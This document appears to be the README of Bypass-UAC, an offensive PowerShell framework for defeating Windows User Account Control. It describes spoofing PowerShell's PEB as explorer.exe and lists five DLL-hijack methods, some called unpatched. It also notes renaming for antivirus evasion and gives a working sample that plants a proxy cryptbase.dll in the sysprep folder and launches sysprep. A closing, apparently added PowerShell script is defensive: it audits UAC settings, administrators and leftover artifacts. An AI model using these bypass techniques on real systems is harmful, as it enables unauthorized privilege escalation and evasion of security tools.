Latest commit a281d3c Nov 1, 2016
Bypass-UAC provides a framework to perform UAC bypasses based on auto-elevating IFileOperation COM object method calls. This is not a new technique; traditionally it is accomplished by injecting a DLL into "explorer.exe". That approach is not desirable because injecting into explorer may trigger security alerts, and working with unmanaged DLLs makes for an inflexible work-flow.

To get around this, Bypass-UAC implements a function which rewrites PowerShell's PEB to give it the appearance of "explorer.exe". This has the same effect because the COM objects rely exclusively on Windows' Process Status API (PSAPI), which reads the process PEB.


Bypass-UAC is self-contained and does not have any dependencies, bar a requirement that the target have PowerShell v2.


  • UacMethodSysprep: Original technique by Leo Davidson (sysprep -> cryptbase.dll)
    • Targets: x32/x64 Windows 7 & 8
  • ucmDismMethod: Hybrid method (PkgMgr -> DISM -> dismcore.dll)
    • Targets: x64 Win7+ (currently unpatched)
  • UacMethodMMC2: Hybrid method (mmc -> rsop.msc -> wbemcomn.dll)
    • Targets: x64 Win7+ (currently unpatched)
  • UacMethodTcmsetup: Hybrid method (tcmsetup -> tcmsetup.exe.local -> comctl32.dll)
    • Targets: x32/x64 Win7+ (UAC "0day" ¯\_(ツ)_/¯)
  • UacMethodNetOle32: Hybrid method (mmc some.msc -> Microsoft.NET\Framework[64]..\ole32.dll)
    • Targets: x32/x64 Win7+ (UAC "0day" ¯\_(ツ)_/¯)

Sample Output

Win 7 Pro


Win 10 Pro




PSReflect, by @mattifestation, allows you to easily define in-memory enums, structs, and Win32 functions. This is necessary because it lets PowerShell use the Windows API without compiling C# at runtime. Doing that is OK most of the time, but it writes temporary files to disk and won't work if csc is blacklisted.


A modified version of Masquerade-PEB, changed to use PSReflect. This function overwrites PowerShell's PEB to impersonate "explorer.exe".


Load a .NET dll into memory which exposes an IFileOperation COM object interface to PowerShell. This is based on work done by Stephen Toub, published in the December 2007 MSDN magazine (I added the pages in the images folder for reference). Further details available in the FileOperations folder.

PS C:\Users\b33f> $IFileOperation |Get-Member
    TypeName: FileOperation.FileOperation
 Name              MemberType Definition
 ----              ---------- ----------
 CopyItem          Method     void CopyItem(string source, string destination, string newName)
 DeleteItem        Method     void DeleteItem(string source)
 Dispose           Method     void Dispose(), void IDisposable.Dispose()
 Equals            Method     bool Equals(System.Object obj)
 GetHashCode       Method     int GetHashCode()
 GetType           Method     type GetType()
 MoveItem          Method     void MoveItem(string source, string destination, string newName)
 NewItem           Method     void NewItem(string folderName, string name, System.IO.FileAttributes attrs)
 PerformOperations Method     void PerformOperations()
 RenameItem        Method     void RenameItem(string source, string newName)
 ToString          Method     string ToString()


Bootstrap function which writes an x32/x64 proxy DLL to disk (Yamabiko). This DLL is based on fubuki from @hfiref0x's UACME project. Mostly I stripped out the redundant functionality and did some minor renaming for AV evasion. Further details are available in the Yamabiko folder.


Currently there are five methods in Bypass-UAC. I will add more gradually, but it would be awesome if people want to contribute. It is really easy to add a new method, provided all it needs is an elevated file copy/move/rename or folder creation. A sample method can be seen below for reference.

    # Original Leo Davidson sysprep method
    # Works on everything pre 8.1
    if ($OSMajorMinor -ge 6.3) {
        echo "[!] Your OS does not support this method!`n"
        return
    }

    # Impersonate explorer.exe
    echo "`n[!] Impersonating explorer.exe!"
    Masquerade-PEB -BinPath "C:\Windows\explorer.exe"

    if ($DllPath) {
        echo "[>] Using custom proxy dll.."
        echo "[+] Dll path: $DllPath"
    } else {
        # Write Yamabiko.dll to disk
        echo "[>] Dropping proxy dll.."
    }

    # Expose IFileOperation COM object

    # Exploit logic
    echo "[>] Performing elevated IFileOperation::MoveItem operation.."
    $IFileOperation.MoveItem($DllPath, $($env:SystemRoot + '\System32\sysprep\'), "cryptbase.dll")
    echo "`n[?] Executing sysprep.."
    IEX $($env:SystemRoot + '\System32\sysprep\sysprep.exe')

    # Clean-up
    echo "[!] UAC artifact: $($env:SystemRoot + '\System32\sysprep\cryptbase.dll')`n"
Similarly, using EXPORTSTOC++ you can easily copy/paste exports into Yamabiko to target new binaries!


This project is for authorized use only; that goes without saying. I don't take responsibility for foolish people doing bad things!

Protect Yourself

  • Don't provide users with local Administrator rights.
  • Change the default UAC setting to "Always notify me and wait for my response" & require users to enter their password.
  • Remember Microsoft's official position is that UAC is not a security feature!
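The three points above can be checked from a PowerShell prompt. The script below is an added example, not part of the Bypass-UAC project: it reads the UAC policy values that back the "Always notify" setting, lists the members of the local Administrators group, and looks for the on-disk artifact the sysprep method leaves behind (`System32\sysprep\cryptbase.dll`, named in the sample method above). The `tcmsetup.exe.local` location and the function names are assumptions made for this example.

```powershell
# Added example (not project code): audit the "Protect Yourself" recommendations.
# Registry value names are the documented UAC policy values; the tcmsetup.exe.local
# path is an assumption based on the method list (a .local folder beside the binary).

$PolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

$ArtifactPaths = @(
    (Join-Path $env:SystemRoot 'System32\sysprep\cryptbase.dll'),  # named in the README
    (Join-Path $env:SystemRoot 'System32\tcmsetup.exe.local')      # assumed location
)

function Get-UacPolicy {
    # Returns the three values that decide how (and whether) admins are prompted.
    $p = Get-ItemProperty -Path $PolicyKey -ErrorAction Stop
    New-Object PSObject -Property @{
        EnableLUA                  = [int]$p.EnableLUA
        ConsentPromptBehaviorAdmin = [int]$p.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = [int]$p.PromptOnSecureDesktop
    }
}

function Test-UacHardened {
    param([Parameter(Mandatory = $true)]$Policy)
    # "Always notify me and wait for my response" means every elevation prompts on the
    # secure desktop: ConsentPromptBehaviorAdmin 1 = prompt for credentials (the
    # README's password requirement), 2 = prompt for consent only. Any other value
    # (e.g. the default 5) lets signed Windows binaries auto-elevate silently.
    $findings = @()
    if ($Policy.EnableLUA -ne 1) { $findings += 'UAC is disabled (EnableLUA != 1)' }
    if ($Policy.PromptOnSecureDesktop -ne 1) { $findings += 'Prompts are not shown on the secure desktop' }
    switch ($Policy.ConsentPromptBehaviorAdmin) {
        1 { }
        2 { $findings += 'Admins are only asked for consent; require a password (ConsentPromptBehaviorAdmin = 1)' }
        default { $findings += "ConsentPromptBehaviorAdmin = $($Policy.ConsentPromptBehaviorAdmin) is not 'Always notify' (1 or 2)" }
    }
    return $findings
}

function Get-LocalAdministrators {
    # ADSI WinNT provider works back to PowerShell v2, which this project targets.
    $group = [ADSI]'WinNT://./Administrators,group'
    @($group.psbase.Invoke('Members')) | ForEach-Object {
        $_.GetType().InvokeMember('Name', 'GetProperty', $null, $_, $null)
    }
}

function Find-UacArtifact {
    # A leftover proxy DLL or .local folder in System32 is a sign a bypass ran here.
    $ArtifactPaths | Where-Object { Test-Path $_ }
}

# Report
$policy = Get-UacPolicy
Write-Output "[*] UAC policy: EnableLUA=$($policy.EnableLUA) ConsentPromptBehaviorAdmin=$($policy.ConsentPromptBehaviorAdmin) PromptOnSecureDesktop=$($policy.PromptOnSecureDesktop)"
$findings = @(Test-UacHardened -Policy $policy)
if ($findings.Count -eq 0) { Write-Output '[+] UAC is set to Always notify with a password prompt' }
else { $findings | ForEach-Object { Write-Output "[!] $_" } }

Write-Output "[*] Local Administrators: $((Get-LocalAdministrators) -join ', ')"

$artifacts = @(Find-UacArtifact)
if ($artifacts.Count -eq 0) { Write-Output '[+] No known bypass artifacts found' }
else { $artifacts | ForEach-Object { Write-Output "[!] Artifact present: $_" } }
```

Run it from an elevated prompt so the Administrators group enumerates fully; the registry and artifact checks work from a standard user. Note that hardening the prompt only raises the bar: a user who is a local administrator still holds the rights, which is why the first bullet comes first.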